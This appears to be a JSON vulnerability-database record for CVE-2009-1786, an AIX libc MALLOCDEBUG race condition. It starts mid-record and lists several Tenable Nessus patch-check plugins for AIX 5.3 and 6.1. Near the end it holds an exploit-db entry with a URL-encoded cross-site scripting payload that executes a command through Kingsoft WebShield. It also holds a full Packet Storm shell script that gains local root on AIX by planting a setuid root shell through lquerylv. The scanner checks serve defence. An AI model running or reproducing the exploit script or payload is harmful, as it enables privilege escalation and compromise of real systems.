value:\"2009/05/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"6.1\", ml:\"00\", patch:\"IZ50139_00\", package:\"bos.rte.libc\", minfilesetver:\"6.1.0.0\", maxfilesetver:\"6.1.0.9\") < 0) flag++;\nif (aix_check_ifix(release:\"6.1\", ml:\"00\", patch:\"IZ50139_00\", package:\"bos.rte.libc\", minfilesetver:\"6.1.1.0\", maxfilesetver:\"6.1.0.4\") < 0) flag++;\nif (aix_check_ifix(release:\"6.1\", ml:\"00\", patch:\"IZ50139_00\", package:\"bos.rte.libc\", minfilesetver:\"6.1.2.0\", maxfilesetver:\"6.1.0.3\") < 0) flag++;\nif (aix_check_ifix(release:\"6.1\", ml:\"00\", patch:\"IZ50139_00\", package:\"bos.adt.prof\", minfilesetver:\"6.1.0.0\", maxfilesetver:\"6.1.0.9\") < 0) flag++;\nif (aix_check_ifix(release:\"6.1\", ml:\"00\", patch:\"IZ50139_00\", package:\"bos.adt.prof\", minfilesetver:\"6.1.1.0\", maxfilesetver:\"6.1.0.4\") < 0) flag++;\nif (aix_check_ifix(release:\"6.1\", ml:\"00\", patch:\"IZ50139_00\", package:\"bos.adt.prof\", minfilesetver:\"6.1.2.0\", maxfilesetver:\"6.1.0.3\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:aix_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:15:34", "bulletinFamily": "scanner", "description": "There is a race condition in the MALLOCDEBUG debugging component of\nthe malloc subsystem in the library libc.a. A local user can exploit\nthis race condition when executing setuid root programs and thereby\noverwrite any file in the system.\n\nThe successful exploitation of this vulnerability allows a local user\nto overwrite arbitrary files and execute arbitrary code as the root\nuser.\n\nThe following libraries are vulnerable :\n\n/usr/ccs/lib/libc.a /usr/ccs/lib/libp/libc.a.", "modified": "2013-03-11T00:00:00", "published": "2013-01-30T00:00:00", "id": "AIX_IZ50129.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=64326", "title": "AIX 6.1 TL 1 : libc (IZ50129)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory libc_advisory.asc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(64326);\n script_version(\"$Revision: 1.2 $\");\n script_cvs_date(\"$Date: 2013/03/11 18:51:58 $\");\n\n script_cve_id(\"CVE-2009-1786\");\n\n script_name(english:\"AIX 6.1 TL 1 : libc (IZ50129)\");\n script_summary(english:\"Check for APAR IZ50129\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"There is a race condition in the MALLOCDEBUG debugging component of\nthe malloc subsystem in the library libc.a. A local user can exploit\nthis race condition when executing setuid root programs and thereby\noverwrite any file in the system.\n\nThe successful exploitation of this vulnerability allows a local user\nto overwrite arbitrary files and execute arbitrary code as the root\nuser.\n\nThe following libraries are vulnerable :\n\n/usr/ccs/lib/libc.a /usr/ccs/lib/libp/libc.a.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://aix.software.ibm.com/aix/efixes/security/libc_advisory.asc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate interim fix.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(362);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:6.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/05/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"6.1\", ml:\"01\", patch:\"IZ50129_01\", package:\"bos.rte.libc\", minfilesetver:\"6.1.1.0\", maxfilesetver:\"6.1.0.4\") < 0) flag++;\nif (aix_check_ifix(release:\"6.1\", ml:\"01\", patch:\"IZ50129_01\", package:\"bos.adt.prof\", minfilesetver:\"6.1.1.0\", maxfilesetver:\"6.1.0.4\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:aix_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:15:34", "bulletinFamily": "scanner", "description": "There is a race condition in the MALLOCDEBUG debugging component of\nthe malloc subsystem in the library libc.a. A local user can exploit\nthis race condition when executing setuid root programs and thereby\noverwrite any file in the system.\n\nThe successful exploitation of this vulnerability allows a local user\nto overwrite arbitrary files and execute arbitrary code as the root\nuser.\n\nThe following libraries are vulnerable :\n\n/usr/ccs/lib/libc.a /usr/ccs/lib/libp/libc.a.", "modified": "2013-03-11T00:00:00", "published": "2013-01-30T00:00:00", "id": "AIX_IZ50500.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=64330", "title": "AIX 5.3 TL 0 : libc (IZ50500)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory libc_advisory.asc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(64330);\n script_version(\"$Revision: 1.2 $\");\n script_cvs_date(\"$Date: 2013/03/11 18:51:58 $\");\n\n script_cve_id(\"CVE-2009-1786\");\n\n script_name(english:\"AIX 5.3 TL 0 : libc (IZ50500)\");\n script_summary(english:\"Check for APAR IZ50500\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"There is a race condition in the MALLOCDEBUG debugging component of\nthe malloc subsystem in the library libc.a. A local user can exploit\nthis race condition when executing setuid root programs and thereby\noverwrite any file in the system.\n\nThe successful exploitation of this vulnerability allows a local user\nto overwrite arbitrary files and execute arbitrary code as the root\nuser.\n\nThe following libraries are vulnerable :\n\n/usr/ccs/lib/libc.a /usr/ccs/lib/libp/libc.a.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://aix.software.ibm.com/aix/efixes/security/libc_advisory.asc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate interim fix.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(362);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:5.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/05/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"5.3\", ml:\"00\", patch:\"IZ50500_06\", package:\"bos.rte.libc\", minfilesetver:\"5.3.0.0\", maxfilesetver:\"5.3.0.71\") < 0) flag++;\nif (aix_check_ifix(release:\"5.3\", ml:\"00\", patch:\"IZ50500_06\", package:\"bos.adt.prof\", minfilesetver:\"5.3.0.0\", maxfilesetver:\"5.3.0.71\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:aix_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-03T18:15:49", "bulletinFamily": "exploit", "description": "Kingsoft Webshield 1.1.0.62 Cross Site scripting and Remote Command Execution Vulnerability. CVE-2009-1786. Webapps exploit for php platform", "modified": "2009-05-20T00:00:00", "published": "2009-05-20T00:00:00", "id": "EDB-ID:33001", "href": "https://www.exploit-db.com/exploits/33001/", "type": "exploitdb", "title": "Kingsoft Webshield 1.1.0.62 - Cross-Site scripting and Remote Command Execution Vulnerability", "sourceData": "source: http://www.securityfocus.com/bid/35038/info\r\n\r\nThe Webshield feature of Kingsoft Internet Security 9 is prone to a remote cross-site scripting and command-execution vulnerability.\r\n\r\nRemote attackers may exploit this vulnerability to compromise an affected computer.\r\n\r\nThis issue affects WebShield 1.1.0.62 and prior versions. \r\n\r\nhttp://www.example.com/index.php?html=%3c%70%20%73%74%79%6c%65%3d%22%62%61%63%6b%67%72%6f%75%6e%64%3a%75%72%6c%28%6a%61%76%61%73%63%72%69%70%74%3a%70%61%72%65%6e%74%2e%43%61%6c%6c%43%46%75%6e%63%28%27%65%78%65%63%27%2c%27%63%3a%5c%5c%77%69%6e%64%6f%77%73%5c%5c%73%79%73%74%65%6d%33%32%5c%5c%63%61%6c%63%2e%65%78%65%27%20%29%29%22%3e%74%65%73%74%3c%2f%70%3e\r\n\r\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/33001/"}], "packetstorm": [{"lastseen": "2016-12-05T22:19:22", "bulletinFamily": "exploit", "description": "", "modified": "2016-11-04T00:00:00", "published": "2016-11-04T00:00:00", "href": "https://packetstormsecurity.com/files/139565/AIX-5.3-6.1-7.1-7.2-lquerylv-Local-Root.html", "id": "PACKETSTORM:139565", "title": "AIX 5.3 / 6.1 / 7.1 / 7.2 lquerylv Local Root", "type": "packetstorm", "sourceData": "`#!/usr/bin/sh \n# \n# AIX lquerylv 5.3, 6.1, 7.1, 7.2 local root exploit. Tested against latest patchset (7100-04) \n# \n# This exploit takes advantage of known issues with debugging functions \n# within the AIX linker library. We are taking advantage of known \n# functionality, and focusing on badly coded SUID binaries which do not \n# adhere to proper security checks prior to seteuid/open/writes. \n# \n# The CVEs we will be taking advantage of: \n# - CVE-2009-1786: The malloc subsystem in libc in IBM AIX 5.3 and 6.1 allows \n# local users to create or overwrite arbitrary files via a symlink attack on \n# the log file associated with the MALLOCDEBUG environment variable. \n# \n# - CVE-2009-2669: A certain debugging component in IBM AIX 5.3 and 6.1 does \n# not properly handle the (1) _LIB_INIT_DBG and (2) _LIB_INIT_DBG_FILE \n# environment variables, which allows local users to gain privileges by \n# leveraging a setuid-root program to create an arbitrary root-owned file \n# with world-writable permissions, related to libC.a (aka the XL C++ runtime \n# library) in AIX 5.3 and libc.a in AIX 6.1. \n# \n# - CVE-2014-3074: Runtime Linker Allows Privilege Escalation Via Arbitrary \n# File Writes In IBM AIX. \n# \n# In each instance of the aforementioned CVEs, IBM merely patched the binaries \n# which were reported in the original reports as being used for escalation of \n# the vulnerabilities. This allowed for the lquerylv binary to slip by their \n# patches and become an attack vector. \n# \n# Blog post URL: https://rhinosecuritylabs.com/2016/11/03/unix-nostalgia-hunting-zeroday-vulnerabilities-ibm-aix/ \n# \n# lqueryroot.sh by @hxmonsegur [2016 //RSL] \n \nROOTSHELL=/tmp/shell-$(od -N4 -tu /dev/random | awk 'NR==1 {print $2} {}') \nAPP=$0 \n \nfunction usage \n{ \necho \"Usage: $APP [1] | [2] | [3]\" \necho \necho \"1 - MALLOCDEBUG file write -> escalation\" \necho \"2 - _LIB_INIT_DBG_FILE file write -> escalation\" \necho \"3 - MALLOCBUCKETS file write -> escalation\" \necho \necho \"[lquerylv] AIX 5.3/6.1/7.1/7.2 Privilege escalation by @hxmonsegur //RSL\" \nexit \n} \n \nfunction CVE20091786 \n{ \necho \"[*] Exporting MALLOCDEBUG environment variable\" \nMALLOCTYPE=debug \nMALLOCDEBUG=report_allocations,output:/etc/suid_profile \nexport MALLOCTYPE MALLOCDEBUG \n} \n \nfunction CVE20092669 \n{ \necho \"[*] Exporting _LIB_INIT_DBG_FILE environment variable\" \n_LIB_INIT_DBG=1 \n_LIB_INIT_DBG_FILE=/etc/suid_profile \nexport _LIB_INIT_DBG _LIB_INIT_DBG_FILE \n} \n \nfunction CVE20143074 \n{ \necho \"[*] Exporting MALLOCBUCKETS environment variable\" \nMALLOCOPTIONS=buckets \nMALLOCBUCKETS=number_of_buckets:8,bucket_statistics:/etc/suid_profile \nexport MALLOCOPTIONS MALLOCBUCKETS \n} \n \nif [ -z \"$1\" ]; then \nusage \nexit 1 \nfi \n \nwhile [ \"$1\" != \"\" ]; do \ncase $1 in \n1 ) CVE20091786;; \n2 ) CVE20092669;; \n3 ) CVE20143074;; \n* ) usage \nbreak;; \nesac \nshift \ndone \n \nif [ ! -x \"/usr/sbin/lquerylv\" ]; then \necho \"[-] lquerylv isn't executable. Tough luck.\" \nexit 1 \nfi \n \necho \"[*] Setting umask to 000\" \numask 000 \n \necho \"[*] Execute our vulnerable binary\" \n/usr/sbin/lquerylv >/dev/null 2>&1 \n \nif [ ! -e \"/etc/suid_profile\" ]; then \necho \"[-] /etc/suid_profile does not exist and exploit failed.\" \nexit 1 \nfi \n \necho \"[*] Cleaning up /etc/suid_profile\" \necho > /etc/suid_profile \n \necho \"[*] Current id: `/usr/bin/id`\" \n \necho \"[*] Adding payload\" \ncat << EOF >/etc/suid_profile \ncp /bin/ksh $ROOTSHELL \n/usr/bin/syscall setreuid 0 0 \nchown root:system $ROOTSHELL \nchmod 6755 $ROOTSHELL \nrm /etc/suid_profile \nEOF \n \necho \"[*] Unsetting env\" \nunset MALLOCBUCKETS MALLOCOPTIONS _LIB_INIT_DBG_FILE _LIB_INIT_DBG MALLOCDEBUG MALLOCTYPE \n \necho \"[*] Executing ibstat for fun and profit\" \n/usr/bin/ibstat -a >/dev/null 2>&1 \n \nif [ ! -e \"$ROOTSHELL\" ]; then \necho \"[-] Rootshell does not exist and exploit failed.\" \nexit 1 \nfi \n \necho \"[*] Executing rootshell\" \n$ROOTSHELL \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/139565/aixlquery-escalate.txt", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
